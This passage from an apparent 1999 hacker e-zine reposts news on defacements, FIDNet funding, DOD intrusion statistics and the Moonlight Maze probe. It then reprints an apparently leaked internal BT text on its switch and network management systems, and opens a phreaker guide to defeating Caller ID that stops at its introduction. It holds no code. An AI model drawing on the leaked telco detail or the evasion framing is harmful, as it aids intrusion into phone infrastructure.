     Engineering Lab at the Seoul National University, according to
     Attrition.org's archives.  And an Attrition.org official told Newsbytes
     in an e-mail interview that hV2k has been cracking sites for some time.

     Attrition.org is at http://www.attrition.org .

     Reported By Newsbytes.com, http://www.newsbytes.com .

     13:12 CST
     Reposted 13:53 CST

@HWA

35.0 Emergency FidNet Funding Canceled
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Evilwench
     After the House Appropriations Committee eliminated funding for the
     proposed Federal Intrusion Detection surveillance system (FIDNet), the
     White House found other funding through a $611 million mid-year fiscal
     2000 budget amendment.  Now, less than one week before the Clinton
     Administration's proposed network security plan is slated to be
     unveiled, Congress has refused the request to provide the $39 million
     to fund the project.  The proposed FIDNet system will be run by the
     General Services Administration, which hopes that supplemental funding
     for FIDNet will be found by January but will go ahead with the plan
     regardless of whether specific money is allocated.
     Government Executive Magazine
     http://www.govexec.com/dailyfed/1199/110399b3.htm

     November 3, 1999

     DAILY BRIEFING

     Congress refuses to fund security network

     By Drew Clark, National Journal's Technology Daily

     Less than one week before the Clinton Administration's proposed
     network security plan is slated to be unveiled and discussed, Congress
     has refused a last-minute request to provide $39 million in
     funds—including $8.4 million for the controversial Federal Intrusion
     Detection Network (FIDNet)—until at least January.

     Although House Majority Leader Richard Armey, R-Texas, has raised a
     number of questions about the privacy implications of FIDNet, the
     principal objection seems to be money.  And with the House unwilling
     to dip into other sources to accommodate the administration's computer
     security proposal, the lack of funding could further delay the
     full-scale rollout of critical infrastructure plans.

     "The request came as an amendment to the Treasury-Postal
     appropriations bill after it had been signed into law," said John
     Scofield, a spokesman for House Appropriations Committee Chairman C.W.
     "Bill" Young, R-FL.  "We didn't have time to give it consideration and
     will look at it next year."

     The administration had proposed funding the programs by using the
     counter-terrorism fund of the Department of Justice, Scofield said.
     But he said a Department of Justice program "shouldn't be used as a
     funding mechanism for something that is administration wide."
     Besides money for FIDNet, the request included $17 million for a
     program to train and recruit students in cyber-security; $2 million for
     the Department of Commerce's Bureau of Export Administration to support
     Information Sharing and Assessment Centers (ISACs), a public-private
     partnership to protect critical infrastructure; $5 million for computer
     security projects to be run by the National Institute of Standards and
     Technology; and $7 million for the Department of Treasury to help
     federal agencies establish public key infrastructures to conduct
     electronic transactions.

     Officials at the General Services Administration said they were
     prepared to continue bare-bones funding for FIDNet out of operating
     revenue—something they have done for the related Federal Computer
     Incident Response Capability (FedCIRC), a program the agency inherited
     from the Department of Commerce's National Institute of Standards and
     Technology last year.  The agency hopes that supplemental funding for
     FIDNet will be found by January.

     Without funding, "we can go ahead with the minimum activity as we have
     for the last several months," said Sallie McDonald, deputy assistant
     commissioner at GSA's office of information security.

     The administration's critical infrastructure plan is expected to be
     unveiled at a conference next Tuesday.  But a pre-release summit
     involving officials from industry, government, and privacy advocates is
     planned for Thursday at the State Department, said a panelist for the
     event.

@HWA

36.0 Cyberattacks Against DOD up 300 Percent
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by Weld Pond
     Lt. Gen. David Kelley, the director of the Defense Information Systems
     Agency, has said that the number of cyber attacks reported this year
     against the Defense Department's information networks has more than
     tripled compared with last year.
     The number of cyber attacks or unauthorized intrusions into DOD
     networks and systems went from 5,844 in 1998 to 18,433 so far during
     1999.

     Federal Computer Week
     http://www.fcw.com/pubs/fcw/1999/1101/web-attack-11-03-99.html

     NOVEMBER 3, 1999 . . . 18:21 EST

     Cyberattacks against DOD up 300 percent this year

     BY DANIEL VERTON (dan_verton@fcw.com)

     Atlantic City -- The number of cyberattacks reported this year against
     the Defense Department's information networks has more than tripled
     compared with last year, according to the director of the Defense
     Information Systems Agency.

     The number of reported cyberattacks or unauthorized intrusions into DOD
     networks and systems skyrocketed from 5,844 in 1998 to 18,433 so far
     during 1999, according to Lt. Gen. David Kelley, director of DISA and
     manager of the National Communications System.  Because not all attacks
     and intrusions are detected or reported by local system administrators
     and security officials, that number could be significantly higher.

     Speaking on Nov. 1 at the MILCOM 1999 conference, a three-day symposium
     focusing on military communications issues in the 21st century, Kelley
     said a look at the past five years indicates that cybersecurity and
     cyberwarfare is a "growth industry."  According to Kelley, DOD
     organizations in 1994 reported only 225 attacks or unauthorized network
     intrusions -- roughly 1 percent of the number reported so far in 1999.

     "We need smarter systems that can help heal themselves," Kelley said,
     outlining his ideas for a departmentwide information assurance program.
     "Hope is not a strategy," he said.  "With 100 percent certainty, this
     nation will face an information attack...[and] a serious one.  We've
     got to get prepared."

     A sustained and coordinated intrusion into DOD networks that took place
     between January and March remains under investigation by the FBI [FCW,
     March 8].  The high-profile incident has led investigators to believe
     the hackers launched their attack using systems residing in Russia.
     However, no evidence has been released that implicates the Russian
     government in the attack.

@HWA

37.0 White House Says US Vulnerable to Cyber Attack
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/

     contributed by de4th
     Richard Clarke, a National Security Council advisor, has warned against
     the loss of electricity, transportation, or telecommunications due to
     information warfare.  He said that many people were still in denial and
     that it was time to wake up to reality.

     Nando Times
     http://www.nandotimes.com/technology/story/body/0,1634,500053548-500087899-500306408-0,00.html

     U.S. vulnerable to cyber attacks, White House official says

     Copyright © 1999 Nando Media
     Copyright © 1999 Associated Press

     By EUN-KYUNG KIM

     WASHINGTON (November 4, 1999 9:50 p.m. EST http://www.nandotimes.com) -
     Reliance on the Internet has made the nation vulnerable to attacks by
     terrorists who strike through computers rather than with bombs or
     bullets, a White House security adviser said Thursday.

     "We could wake one morning and find a city, or a sector of the country,
     or the whole country have an electric power problem, a transportation
     problem or a telecommunication problem because there was a surprise
     attack using information warfare," said Richard Clarke, the National
     Security Council adviser who heads counterterrorism efforts.

     Clarke, speaking at a cyberthreat summit, said most Americans fail to
     realize how dependent they have become on computers - not only at home
     or at the office, but also to run their electricity, telephone,
     transportation and other infrastructure systems.

     Clarke compared the reliance to former drug addicts enrolled in a
     recovery program.  "We need to take a lesson from that - at least they
     know they have a dependency problem.  Many of you are still in denial,"
     he told his audience during his keynote address.  "Many people in the
     United States are still in denial."
The summit, intended to raise awareness about computer security, follows a string of electronic attacks launched against federal government Web sites, including those run by the White House, the Senate, the FBI and the U.S. Army's main Internet site.

Last month, the head of the FBI's National Infrastructure Protection Center testified before Congress about the agency's struggle to keep up its battle against threats posed by computer-savvy terrorists and hackers trying to break into the government's most sensitive data networks. And, the General Accounting Office, the investigative arm of Congress, released a report warning that computer systems at the Defense Department, law enforcement and private industries are at risk because of poor management and lax oversight.

Clarke said the nation's frenzy over the Y2K computer bug has made it even more vulnerable to cyber attacks. He said technicians hired to make a company's computer system Y2K compliant could easily slip "a little Trojan horse or malicious code" into the system instead.

Clarke's warning echoed one issued by Sen. Robert Bennett, R-Utah, during a recent speech at the National Press Club. Bennett, chairman of the Senate's Year 2000 Committee, said he wouldn't be surprised to see his panel continue work next year on problems uncovered by the Y2K bug - mainly security and reliability.

"We expect that (terrorists) will attempt to use Y2K as a cover for putting some kind of attack into a vulnerable place," Bennett said. "That is, when a Y2K solution goes in, they will fly underneath that with an attack of their own that will shut the system down and then you won't know whether the system shutdown was because of a terrorist attack or because of a Y2K accident."

Clarke said the government has taken numerous steps to counter potential cyber attacks, including stepping up intelligence efforts, improving systems to detect intrusions and working with the private industries to come up with solutions.
@HWA

38.0 Russia Withholding Information on Computer Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

U.S. Government computer experts have traced the code named Moonlight Maze attack to Internet service providers linked to Russia's Academy of Sciences, a government-funded group involved in research projects with military and civilian applications. Russian officials however aren't coming clean with information regarding these attacks, leaving some investigators to wonder why.

Reuters - Via Excite
http://news.excite.com/news/r/991104/15/net-russia-usa

Moscow Said To Withhold Full Help On Cyber-Blitz

Updated 3:42 PM ET November 4, 1999

By Jim Wolf

WASHINGTON (Reuters) - Russian authorities have withheld full cooperation in a multinational probe of computer heists from sensitive Defense Department and other U.S. networks, a top National Security Agency official said.

"They haven't been fully forthcoming about what's happened on the Net," John Nagengast, assistant deputy director for information systems security, said late Wednesday.

U.S. authorities are not yet sure whether electronic back doors may have been secretly crafted as part of the intrusions dubbed Moonlight Maze, he said in an interview with Reuters.

"Did they leave behind a port for future access?" Nagengast asked rhetorically. "There's no conclusion you can draw and say 'It's finished. It's over'."

Nagengast spoke after outlining cyber threats to the Overseas Security Advisory Council, a State Department-led group that feeds security-related information to more than 1,700 U.S. companies with overseas interests.

U.S. government computer experts have traced the Moonlight Maze blitz to Internet service providers linked to Russia's Academy of Sciences, a government-funded group involved in research projects with military and civilian applications.
"About the furthest I can go is to say the intrusions appear to originate in Russia," Michael Vatis, the top U.S. "cyber cop" told Congress last month in the first public rundown on the investigation by an executive branch official.

Vatis, who heads the FBI-led National Infrastructure Protection Center, said intruders had stolen "unclassified but still-sensitive information about essentially defense technical research matters."

Nagengast said Vatis had gone to Russia to pursue the case but had come back without having been able to obtain all the records he would have liked to help trace the culprits.

"Some of the feedback we've gotten is 'we just don't have good audit logs -- so we don't know where these things could have come from'," Nagengast said, paraphrasing the Russian response.

A spokeswoman for Vatis declined comment.

Nagengast said it was premature to conclude that the cyber blitz, first detected in March 1998, was carried out by anyone in Russia just because it was routed through a given Internet service provider.

"Was this a kiddie training exercise" by the Russian Academy of Sciences? Nagengast asked rhetorically. "Nobody knows at this point in time," he said.

He added that the decline of known Moonlight Maze attacks could mean the intruders were "getting smarter and harder to see" or that they had "lost interest."

Michael Peters, the National Security Agency's technical director for operations, readiness and assessments, told the meeting on cyber threats that a multinational "hacking" group called the "Enforcers" might be involved in the intrusions.

He said the Enforcers counted members from the United States, Israel, Australia, Brazil and Russia. The group first made itself known when the U.S. government began to prosecute two youths from California for a series of February 1998 cyber break-ins to Defense Department systems.

Nagengast said some of the Moonlight Maze "hacks" had come through computer "hosts" in Britain.
"And of course, they (the British) are fully cooperative with us."

The National Security Agency is the Pentagon arm responsible for the computer security of U.S. national security organizations. The most costly and secretive intelligence agency, it eavesdrops on global communications and provides a steady stream of intercepted electronic data on topics of interest to the U.S. government.

Vatis's organization -- the infrastructure protection center at the FBI -- leads the U.S. effort to prevent, detect and prosecute cyber crime.

Sen. Robert Bennett, who has received classified briefings on "information warfare" as chairman of the special committee on the Year 2000 problem, told Reuters in an interview last month the intruders had vacuumed up vast amounts of publicly available data.

Susan Hansen, a Pentagon spokeswoman, said Thursday that the Defense Department knew of no classified information that had been jeopardized in the Moonlight Maze intrusions.

@HWA

39.0 Who is Richard Smith?
~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by EvilWench

Richard Smith identified the author of the Melissa virus, uncovered Microsoft's suspicious registration practices, he discovered the presence of unique identifying numbers in digital documents and this week, he revealed RealNetworks' sneaky data-gathering practices. (While we like and applaud what Mr. Smith has done we're not sure he rates the label of "living, national treasure".)

Wired
http://www.wired.com/news/technology/0,1282,32252,00.html

The Internet's 'Living Treasure'

by Leander Kahney

2:15 p.m. 2.Nov.1999 PST

Whenever you read about an egregious invasion of consumer privacy on the Internet, one name keeps popping up: Richard Smith.

Smith fingered the author of the Melissa virus. He uncovered Microsoft's suspicious registration practices, and he discovered the presence of unique identifying numbers in the majority of digital documents.
This week, he revealed RealNetworks' sneaky data-gathering practices.

Smith has been at the center of half-a-dozen of the biggest technology stories this summer -- stories reported around the globe. And he does it for love, not money.

"The man's a living, national treasure for the Internet age," said privacy advocate Jason Catlett, founder of Junkbusters. "He's doing wonderful things. Richard's not a privacy zealot. He wants to find the consequences of things.

"He's independent of money and he's independent of politics," Catlett said. "He's very good at thinking through intrusive data gathering. If there were a dozen people like him, the Internet would be a very different place."

A 45-year-old veteran programmer, Smith retired a couple of months ago from Phar Lap, the software company he helped build and still owns but no longer runs.

He started looking at Internet security issues as a hobby about three years ago, uncovering bugs and security holes in email clients and browsers. A year ago he turned his attention to privacy on the Internet.

"We are moving our lives more and more onto the Internet and it's very good at watching what we do," Smith said from his home in Brookline, Massachusetts, where he lives with his wife. "It's like a VCR recording your whole life. It can easily be rewound."

Smith said he's worried that the lack of Internet privacy is a tremendous boon for the direct marketing industry and that personal data will come back to haunt consumers in legal proceedings.

For example, Smith noted that Newt Gingrich's divorce lawyers are trying to keep purportedly sensitive emails out of the hands of his wife's lawyers. In a separate instance, a court ruled this week that telephone companies could sell customers' telephone logs to direct marketers, who can mine the data to determine individual consumer preferences.

"We're going to get more and more junk mail," he said. "The noise level is going to go up and up. Maybe we'll get used to it, but I doubt it."
Smith tapped into the issue of RealNetworks' underhanded data gathering practices while looking for material for a speech. He wanted something fresh to talk about and remembered an inconclusive report he'd read in an April edition of the Seattle Weekly about RealNetworks using secret serial numbers.

He downloaded RealJukebox and loaded up a piece of software, called a packet sniffer, that decodes the stream of information his computer sent out over the Internet.

The first thing he noticed was that every time he used it to play a CD, the software sent the CD's title and playlist to RealNetworks. He also noticed that it encrypted some information, so he enlisted a friend in Australia to break the code and unlock the data. It turned out to be a GUID, or unique identifying number, that can be used to identify who is using the software as effectively as a Social Security number.

Smith said the whole thing took about half an hour, and that most of the time was spent figuring out how to use the RealJukebox software.

He's started looking at other user-monitoring systems. For example, he said he's discovered that some junk email, when read, secretly sends out information about the user. Through banner ads, many high-profile Web sites are sending confidential user registration information to direct marketers without even knowing it.

Smith looks mainly at popular software "so when it hits the press people say 'that affects me. I use that product.'"

He does it for fun and out of curiosity, he said, though he's starting to "pre-consult" for some of the companies he's investigating, opening up the possibility of turning his hobby into a commercial enterprise.

Smith's life hasn't changed much in light of all the publicity he's generated. "I talk to a lot of people I hadn't known before," he said. "I have a different crowd of people I go around with now."
When he discovers a dodgy practice, Smith said the first thing he does is inform the company before writing it up for his Web site.

Sometimes he tells the press before the company. At least, that's what Richard Purcell, the man in charge of Microsoft's data gathering policies, says.

"It would be nice to answer an inquiry before doing it in a public forum," Purcell said. "This is what we call fairness."

Although he may have caused Microsoft some embarrassing public relations headaches, Purcell said he bears no malice toward Smith. In fact, Purcell invited him up to Redmond afterwards to meet a number of the company's product people and flesh out some outstanding privacy issues.

"He's a very talented technologist," Purcell said. "I like him."

@HWA

40.0 Federal Guidelines for Searching and Seizing Computers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by newbie

Worried about being busted? Scared that the feds may come and take all of your computers? Is that Thermite bomb really necessary? This may be of interest, the Federal Guidelines for Searching and Seizing Computers.

Department of Justice
http://www.usdoj.gov/criminal/cybercrime/searching.html#FED_GUID

@HWA

41.0 Canadian Defense Site Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

The Department of National Defense Web site was defaced last Monday night. The National Investigative Service is attempting to locate the perpetrators. Officials said that no sensitive information was accessed.
Globe Technology
http://www.globetechnology.com/archive/gam/News/19991103/UDEFEM.html

National Defence Internet site falls prey to attack by hacker

No sensitive information revealed despite security breach, DND says

TYLER HAMILTON
Technology Reporter
Wednesday, November 3, 1999

Toronto -- Computer hackers broke into the Department of National Defence Web site on Monday night, the latest in a recent series of security breaches on federal, provincial and municipal Web sites in Canada.

DND spokesman Captain André Berdais said the attack was the first major hacking incident on the department's Web site, and that the National Investigative Service is trying to track down who breached the site -- and how they did it.

"We're dealing with this as if it's an act of vandalism," Capt. Berdais said.

He said the breach occurred at about 6 p.m. Monday evening, and that an incident-response team discovered the breach and shut down the site at about 8 p.m.

"There was no sensitive information [accessed]," he said. "What was breached was our Web site that passes information to the public. None of the other internal computer systems have been hit."

This isn't the first time the DND's Web security policies have been the subject of controversy. In September, it was discovered that the resumés of at least five former and current eavesdroppers had been posted on its site, including detailed information about the classified equipment they used and the restricted areas they had access to.

Monday's breach, however, represents the first time a hacker was able to access and manipulate the department's Web site.

Similar attacks have occurred recently on provincial and municipal government Web sites. The City of Mississauga and Peel Board of Education sites were hacked last week, and in August the Web site of Ontario's Ministry of Northern Development and Mines was breached and various network passwords were stolen.
In the latter case, the culprit littered the site with South Park cartoon graffiti and warned the government of its security flaw -- no major information was taken or damage done.

Still, such breaches illustrate how easy it is for hackers to meddle with computer systems -- even those belonging to the federal department in charge of the nation's security -- and how seemingly harmless acts of vandalism can escalate into calculated terrorism.

The Canadian Security Intelligence Service issued a report in August warning that cyberterrorism and Internet vandalism are becoming a major concern for societies that depend on computer-based communications.

Dave Cosgrave, an Internet expert with the Alliance for Converging Technologies in Toronto, said governments around the world are at the stage of weighing the efficiencies and cost savings associated with the Internet with the potential risks of going on-line.

"Certainly, the more you open up government services and information to on-line avenues, [the more] you expose yourself to risk," he said. "But I don't think there's a compelling argument in telling governments to sit back and wait."

Canada has been moving aggressively to bring more public services to the Internet. For example, Canada Post Corp. recently launched an electronic post office to carry the nation's bills, documents and letters in digital form over the Internet. A successful breach of that site might conceivably give a hacker instant access to the nation's mail system.

"I'm not going to say it doesn't bother us, but it's part of business when you have business on the Internet," Capt. Berdais said. "Like everything else in the military, there's lessons learned from any type of incident . . . because it's the Internet, it's not unexpected. And we do have measures to deal with it."
@HWA

42.0 Defacement of South Africa Statistics Site Investigated
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Alien Plague

An investigation into the latest attack on South Africa's Statistics web site has revealed that the assault originated from a dial-up user in the US in the early hours of Wednesday morning. This is the second time in two months the site has been defaced, despite the fact that a private company was called in to provide a firewall and surveillance after the first defacement.

Africa News
http://www.africanews.org/south/southafrica/stories/19991104_feat12.html

South Africa Statistics website hacked again despite surveillance

Business Day (Johannesburg)
November 4, 1999
By Pamela Whitby

Johannesburg - An investigation into the latest attack on Statistics SA's website has revealed that the hack originated from a dial-up user in the US in the early hours of yesterday morning.

This is the second time the website has been hacked into in two months, despite Statistics SA contracting a private sector company to provide a firewall and surveillance.

Statistics SA head Mark Orkin said: "This hack is completely unrelated to the previous one a few weeks ago. An intrusion detection signal was recorded, but before it was picked up the hacker managed to bypass the administrative protection on the server."

While investigating the hack, it was discovered that government sites worldwide are broken into at least 200 times a day. The logs of government websites in SA show these are hacked into two to three times a day.

There was a trade-off between security and accessibility, Orkin said. "We need to offer convenient access for hundreds of genuine visits daily, so we have tried to increase security without obstructing visitors."

The organisation is investigating extra security and will keep the website disconnected from its core systems.
The site is hosted on a stand-alone server "so no core databases or archives were affected".

@HWA

43.0 BT Network Admin Support System Development SYSTEM X and OMC network ops by Hybrid
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://hybrid.dtmf.org/

_\|/_ [ GBH ] Gwahn Burnin Haxorz [ GBH ] _\|/_

BT Network Administration Support System Development
SYSTEM X and OMC network operations..
BT PhoneBone tekniq
By hybrid

NOT TO BE SHOWN OUTSIDE BT. GBH internal awarez.

PART I (Introduction to BT management on the PSTN)

Introduction

The technology within the network has advanced through digitalisation of both transmission and switching, and the introduction of computer controlled network elements. The greater reliability of this technology and the ability to manage and configure the elements remotely has created new opportunities for efficient management of the network. These opportunities have been translated into a vision for the future operation and management of the network, initially through the Network Administration Task Force (NATF) and subsequent refinements in terms of architecture (Network Management Architecture), and process (Strategic Systems Plan (SSP)).

THE VISI0N

The vision can be summarised as:

-+ end-to-end network management
-+ functional coverage of the whole network life cycle
-+ fully integrated functionality
-+ high levels of automation/decision support
-+ conformant to architectural objectives:
   a) network management hierarchy
   b) co-operative network architecture
   c) open systems platform

End-to-End management

It is essential to be able to manage networks made up of elements from different vendors and different generations of equipment in a consistent manner, so that the network can be viewed as a complete entity which provides a managed service platform.
Whole Life Cycle

Networks and services must be managed from 'cradle to grave' (figure 1), covering:

-+ forecasting
-+ requirements analysis
-+ detailed dimensioning and project planning
-+ data building
-+ installation and commissioning
-+ maintenance/billing/traffic management
-+ repair
-+ performance
-+ enhancement/withdrawal

[FIGURE 1: NETWORK AND SERVICE LIFE CYCLE -- a closed loop running from future service and pre-service requirements through forecasting, data building, installing, commissioning and performance, round through statistics, billing, maintenance, traffic management and repair, and back to the start. The original ASCII diagram did not survive extraction.]

Hands free operation

It is essential to give network managers a high level of automation in order to enable them to cope with the levels of complexity involved, vast amounts of data, apparently random nature of problems, and the need for speed, accuracy and consistency in decision making. This requires:

-+ incidents to be analysed automatically with the manager's concurrence being sought to the solution offered;
-+ automatic restoration of service to be achieved whenever possible;
-+ jobs despatched to the workforce based on an optimum approach to jeopardy, costs, tactics and company image;
-+ customer notification of service affected generated automatically to the appropriate customer-facing unit; and
-+ performance statistics kept and analysed on all key processes.

Development challenges

The challenge for the system developers is to be responsive and meet new requirements quickly, while producing enduring systems which fit within an integrated set (the jigsaw), the whole evolving towards the Network Administration Implementation Program (NAIP) and SSP vision in a cost effective manner.

The developers have to move from a position of well over 200 systems, most of which do not interwork, and many of which no longer offer all the essential functions, to a set of around 40 fully integrated high functionality key systems.
Functions must be brought into line with the required business processes and must evolve to match the demands of new network technologies; for instance, planning rules for fibre systems must be continually reviewed to encompass increasing capacities and repeaterless operation. Systems must also take account of the changing operational organisations and procedures, within a framework which can evolve without damaging the software investment already made.

Solutions have to be achieved within four planes of change as illustrated in figure 2.

[FIGURE 2: LINKED PLANES OF CHANGE -- three stacked planes, each linked to the NETWORK on the left and to the plane above and below it:

-+ USER ORGANISATION: people, groups/duties, skillz, procedures
-+ NETWORK MANAGEMENT FUNCTIONS: maintenance, planning, repair control, traffic/control, data building
-+ COMPUTING AND HOST ARCHITECTURE: computers, terminals, database, etc.

The original ASCII diagram did not survive extraction.]

PART II (Administration of BT Network layers)

ohday.

-+ Interface Architecture

The interface architecture provides the means to link all the pieces of the jigsaw together. By a mix of Open Systems Interconnection (OSI) products and pragmatic proprietary products (for example, SNA, DECNET), a communications infrastructure will be deployed to connect users to systems, systems to other systems for information sharing, and systems to the network elements they are managing. Key standards for these interfaces are being defined in the Co-Operative Networking Architecture (CNA-M) programme.

-+ Data Architecture

Data architecture offers the ability to standardise what the processes need to talk about.
Defining the structure and format of the key information items provides a common currency which may be shared by the complete family of support systems. The object orientated style of the CNA-Management communications protocols will force the standardisation of objects as well as simple data structures in the CNA-M programme and external standards bodies like ISO, CCITT and the OSI Network Management Forum.

-+ System (Computing) Architecture

The system architecture defines how a particular system is constructed, rather than the functional role it plays within the jigsaw. This deals with the following main components:

-+ computer hardware
-+ operating system
-+ database management system
-+ transaction processing
-+ communications drivers
-+ man-machine interfacing (MMI), and
-+ application programming interface (API).

There is a drive by the computing industry to create standard open interfaces to these elements, based on UNIX/POSIX and X/Open standards to produce the open platform. The system developers are also driving towards reusable sub-functions and utilities. These two initiatives are being brought together in the Generic Systems Architecture (GSA).

-+ Integration and evolution

SSP, CNA-M, Generic Systems Architecture and the Network Control Architecture Board (NCAB) 5 year vision for support systems evolution have all contributed to creating a clear picture of how support systems will look in the future. It is important, however, that a very pragmatic approach is taken to realising this vision.

-+ SWITCH MANAGEMENT

BT switch management is carried out by the OMC (Operations Maintenance Centre) for local exchanges and the operations and maintenance unit support system (OMUSS) (an OMC derivative) for trunk exchanges. This system has clocked up over 3000 system months of reliable service since its introduction in 1984. As the first major network management system, it has paved the way for the NACC/NOU structure.
[DIAGRAM: SWITCH MANAGEMENT SYSTEMS -- CSS, NMW2 and DCSS sit at the top, feeding NOMS 2, which sits above NOMS 1. Below them FAS, OMC, TMS and OMUSS receive ALARMS from the HOUSE, LOCAL, TRUNK and INTERNATIONAL exchange layers, which are chained together left to right. A DDC collects data from the exchanges and passes it to DESS. The original ASCII diagram did not survive extraction.]

-+ CSS : Customer Service System
-+ NMW2 : Network Management Workstation
-+ DCSS : District Control Support System
-+ NOMS : Network Operations Management System
-+ FAS : Fibre Access System
-+ OMC : Operations and Maintenance Centre
-+ TMS : Transmission Monitoring System
-+ DDC : District Data Collector
-+ DESS : Digital Exchange Support System
-+ OMUSS : Operations and Maintenance Unit Support System

There are over 60 systems in field service, with over 10,000 registered users, covering all trunk and local System X and AXE switches. Enhancement continues to run at a considerable pace, working its way into the field through two major releases per year.
[DIAGRAM: OMC STRUCTURE -- EXCHANGE A and EXCHANGE Z exchange data in both directions with the OMS (Operational Maintenance System), which runs on DEC VAX hardware and provides the user facilities/duties. The OMS feeds the ALARMS HANDLING SYSTEM, a terminal display, and the SRS and LECS systems, and serves four user classes: A) administration users, B) maintenance users, C) remote users, D) other systems. The original ASCII diagram did not survive extraction.]

-+ OMS : Operational Maintenance System
-+ SRS : Subscribers Record System
-+ LECS : Local Equipment Computer System

The system is based on a VAX/VMS platform with Oracle relational database, its own basic forms/menus man-machine interface and X.25/V.24 communications drivers. The exchange interfaces are controlled through flexible data-driven translators and the basic structure of the system is highly modular.

The priority evolution steps for OMC are:

-+ interoperability with CSS, the transmission network surveillance (TNS) system and workforce management (NOMS2)
-+ additional exchange interfaces for advanced services unit (ASU) etc.,
-+ adoption of advanced workstation (NMW2) man-machine interfacing
-+ donation of functions to Generic Event Management (GEMS).

-+ Transmission Management

The transmission monitoring system (TMS) provides a comprehensive surveillance system for the transmission aspects of the network. While the OMC manages a smaller set of complex network elements, the TMS faces the challenge of collecting, collating and displaying information from a vast array of physically dispersed components. After field-trial stages and recent product trials in London, the TMS is now being rolled out into the three pilot NOU catchment areas.
The major TNS functions are:

-+ alarm reception, display, filing, retrieval and archiving;
-+ alarm association and comparison;
-+ performance data processing and display;
-+ access to other systems (for example, the junction network system (JNS) database).

-+ Local Access Management

The flexible access system (FAS) is a system which has been developed to manage fibre in the local loop. Systems have been installed for the City Fibre Network and Docklands. The support system, the service access control centre (SACC), once more shares a common lineage and technology platform with OMC, combined with the ICENI database produced by NMD and used as an element in the service desk and facilities management systems.

FAS was the first system to attempt to adopt the network management hierarchy, with well defined interfaces between the service access control centre (SACC) (network level controller) and element managers developed by equipment suppliers. It also adopted the network management workstation (NMW1) to remove a multitude of various terminals.

Until the future of the FAS is fully determined, the SACC will not be enhanced and evolved. However, the structure of future advanced local access management is being considered based on experience of FAS, LLOFT (the local loop optical fibre trial) and cable TV management.

-+ Data management and performance analysis

The digital exchange support system (DESS) consists of many applications which are grouped together under a single code name. Some of the functions these applications perform are:

-+ data build for new exchanges and major upgrades;
-+ generic network performance statistics by analysing the large volume of data generated by switches;
-+ providing a national reference source for charging information, and associated validation tools to ensure charging integrity;
-+ providing a database and tracking mechanism for all exchange incident reports; and
-+ a register of the hardware and software build levels for all exchanges in the network.
DESS is a major system which runs on the largest VAX cluster configurations in the world. It supports a population of 2000 users, 140 of which may be simultaneously logged into the system. A typical daily workload for DESS would be analysing 1-4 Gigs of exchange generated data, producing 35 thousand pages of printout, and writing or reading 1500 exchange cartridges.

COMING SOON... NOMS INTERNAL NETWORKING OPER4TIONS.

                  .
                  .
                  :
                  |
             +----+ GBH      -+o
             |
             +----> psyclone -+o    +[ 4 HORSEMAN OF THE PSTN NINJ4 APPOCALIPZ ]+--
             +----> hybrid   -+o    +[ GWAHN BURN'IN H4X0RZ ]+--
             +----> gr1p     -+o
             +----> kp       -+o-----+[ _\|/_ ]
                                        |  |
                                        :  :
                                        .  .
 -+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ G ]-+
 -+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ B ]-+
 -+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ H ]-+

@HWA

44.0 Defeating the Caller ID system by Hybrid
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://hybrid.dtmf.org/

-o[ Defeating the Caller ID system ]o-
-o[ D4RKCYDE ]o-
-o[ by hybr1d ]o----------------------------------------

-----BEGIN PGP SIGNED MESSAGE-----

Defeating The Caller ID System With Simple but Effective Stealth.
July 1999.
hybrid (hybrid@dtmf.org) (http://hybrid.dtmf.org)

quick disclaimer: I do not encourage any of the information provided in this file. I, or f41th, cannot be held responsible for your use of the information provided in this article; it has been provided for informational purposes only.

(introduction)

CallerID (CID) or CND (Calling Number Delivery) is an extension to the widely used ANI (Automatic Number Identification) system.
The telcos use ANI as a means for billing information when you make a toll-call; however, despite what a lot of people think, ANI is not used as part of the CID system. It was the first system used to let the receiving party know who was calling and was widely used before the advent of the SS7 telephony protocol, but since the implementation of SS7, CID/CND has become popular, both in residential subscriber loops and commercial lines. In this file I am going to show how the CID/CND system works, specific to different *bell specifications as well as the differences in other countries, such as the UK.

Before we go any further, you need to know the basics of the *bell CID protocol. CID information (data) is transmitted on the subscriber loop using a method known as FSK (Frequency Shift Keyed) modem tones. This data is transmitted in ASCII format and contains the information needed to display the CID message at the terminating line. The actual data burst occurs between the first and second ring of the line, and contains basic information about the originating point of the call, such as the date, time, and of course the calling number. On more up to date systems, or in a local area, the name of the caller will be displayed next to their number as well. Further advances in CID include a new system called CIDCW (CID on Call Waiting), where the call waiting tone is heard and the CID of the second calling person is exposed.

(definition)

As I said before, Caller ID is the identification of the originating subscriber line. For example, say you had a line installed under your own name; your details would be stored alongside your line information in your telco's directory listings. So when you call someone with a CID unit that displays the calling party's name, your name would be displayed alongside the number, or the name of whoever pays the bill for the line.
Obviously the telco has no real way of knowing just _who_ is making the call, so the term Caller ID would be inappropriate; it should technically be referred to as Calling Number Identification, because it is the name of the person associated with the line rental, and not your docs, that is transmitted.

